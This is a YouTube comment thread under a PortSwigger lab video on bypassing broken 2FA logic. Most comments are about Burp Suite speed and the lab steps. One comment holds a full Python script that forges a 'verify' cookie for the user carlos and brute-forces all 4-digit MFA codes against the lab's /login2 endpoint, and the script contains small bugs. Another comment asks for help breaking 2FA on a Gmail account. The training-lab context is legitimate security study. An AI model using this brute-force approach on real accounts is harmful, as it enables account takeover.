2FA broken logic (Video solution, Audio)

แชร์
ฝัง
  • เผยแพร่เมื่อ 4 ก.พ. 2025

ความคิดเห็น • 31

  • @vilislacis3337
    @vilislacis3337 ปีที่แล้ว +13

    I think it may be unsolvable with the Community edition, the lab site expired before I could get to 1000 codes out of 9999 possible.

    • @nishantdalvi9470
      @nishantdalvi9470 ปีที่แล้ว

      # Try the below script
      import itertools
      import requests
      import urllib3
      urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
      def generate_permutations():
      # Generate all permutations of digits 0 to 9 for a 4-digit number
      permutations = itertools.product(range(10), repeat=4)
      # List of all variables which will be taken in use
      all_permutations = []
      user = "carlos"
      url = "0ae0002103a505e782995b19007a00dc.web-security-academy.net"
      url1 = url + "/login2"
      url2 = url + "/login2"
      headers = {'Cookie': 'verify='+ user}
      s = requests.Session()
      # Making of request in order to request a security code
      r = s.get(url1, headers=headers, verify=False)
      if "Please enter your 4-digit security code" in r.text:
      print("A security code has been requested for the user :-" + user)
      # Print as well as shoot a http post request with every permutations
      for perm in permutations:
      current_permutation = "".join(map(str, perm))
      all_permutations.append(current_permutation)
      print(current_permutation)
      r2 = s.post(url2, headers=headers, data={'mfa-code': current_permutation}, verify=False, allow_redirects=False)
      if "Incorrect security code" in r2.text:
      continue
      elif r2.status_code==302:
      return "Try this code :- " + current_permutation
      break
      else:
      print("Something is wrong")
      with open("result.txt", "w") as file:
      file.write(r2.text + "|" + r2.status_code + "
      ")
      # Return all permutations
      def main():
      # Get all permutations
      all_permutations = generate_permutations()
      # Print the number of possibilities
      print(all_permutations)


      if __name__ == "__main__":
      main()

    • @b3twiise853
      @b3twiise853 10 หลายเดือนก่อน

      Use fuff. Copy command as curl payload. Then make minor adjustments.
      Check payload with proxy. I still can’t solve it lol. I get all 200 http resp

    • @antonsuprun8227
      @antonsuprun8227 5 หลายเดือนก่อน +1

      I spent a couple days figuring out why it was so slow with Community edition. Then installed and found out how to use Turbo Intruder extension and solved it in half an hour.

  • @cannaml3630
    @cannaml3630 2 ปีที่แล้ว +8

    what!?!? 10,000 posibilities. No way, I cannot do this with Burp Suite Community Edition. It takes many years :(

  • @denisvoroshilov2682
    @denisvoroshilov2682 2 ปีที่แล้ว +1

    I do like your explanation, Michael!

  • @fighter_osama
    @fighter_osama 3 ปีที่แล้ว +2

    Some site use token as variable so every login must be with new request token

  • @imamuddinalmustaqim8138
    @imamuddinalmustaqim8138 3 ปีที่แล้ว

    The brute Force of yours is so fast. Mine is very slow. Have you changed the video speed for this brute Force scene?

  • @Francesco-ox9ui
    @Francesco-ox9ui 2 ปีที่แล้ว

    hello, i have the community edition version of burp, is that why it is very slow when i do some operation with the intruder?

    • @La_Muerte_Soy
      @La_Muerte_Soy 2 ปีที่แล้ว

      Yes. This version is slower an limited

  • @부정적인간-i3j
    @부정적인간-i3j 2 ปีที่แล้ว

    goood!!!! thanks!!!! 감사합니다 한글이 없어서 댓글 남기고 가요

  • @ucminhnguyen5610
    @ucminhnguyen5610 3 ปีที่แล้ว

    I don't understand what the "send to repeater" step means. Can I use "send to intruder" from the beginning?

    • @Michael10Sommer
      @Michael10Sommer  3 ปีที่แล้ว +1

      If you watch the video you will see that „Send to Repeater“ is an option in Burp 😉

    • @ucminhnguyen5610
      @ucminhnguyen5610 3 ปีที่แล้ว

      @@Michael10Sommer i understrand. Thank you.

    • @datparkournoob5188
      @datparkournoob5188 3 ปีที่แล้ว +3

      @@ucminhnguyen5610 you have to send it to repeater and a send request through to generate a code for Carlos’ account.

    • @ucminhnguyen5610
      @ucminhnguyen5610 3 ปีที่แล้ว

      @@datparkournoob5188 thank you, i understand

  • @carlomariaautelitano6942
    @carlomariaautelitano6942 2 ปีที่แล้ว

    Is it possible to develop a python script to perform a similar action performed by Burpsuite Pro - Intruder?
    Community edition intruder it's too slow, in the meanwhile the session lab expire...

    • @dim_1074
      @dim_1074 2 ปีที่แล้ว +1

      yes, it will not be as fast as the intruder but it will probably be fast enough.

    • @huntit4578
      @huntit4578 2 ปีที่แล้ว +2

      Use Turbo intruder

  • @momogunsabah
    @momogunsabah 5 หลายเดือนก่อน

    i cannot catch what you saying, even using closed caption not helping me.thanks

  • @joker-er5qs
    @joker-er5qs 3 ปีที่แล้ว

    i thought the second step need to skip, never thought it's the first step.

    • @super20187
      @super20187 2 ปีที่แล้ว +1

      no, it is crucial, without second step the system wont generate code for Carlos.

  • @animegamer4017
    @animegamer4017 3 ปีที่แล้ว +1

    It didn't worked I tried the exact steps even the parameter is same but it didn't worked

    • @super20187
      @super20187 2 ปีที่แล้ว

      in the second step, maybe you sent POST /login2 instead of GET /login2, control it.

  • @hsuanchun7655
    @hsuanchun7655 8 หลายเดือนก่อน

    Community is tooooooooo slow😢

  • @محمدفوزان-س2ي
    @محمدفوزان-س2ي 2 ปีที่แล้ว

    Whats the logic behind signing in again in wiener's account and putting wrong 2FA code ?
    We already had responses.
    Anyone

    • @TezaRock
      @TezaRock 2 ปีที่แล้ว

      Just to see the happy path of 2FA login

  • @JuanBotes
    @JuanBotes 3 ปีที่แล้ว

    \o/

  • @Cricketwala2429
    @Cricketwala2429 3 ปีที่แล้ว +1

    Hello bro can you recover my gmail id broke 2fa in my gmail please🙏🙏🙏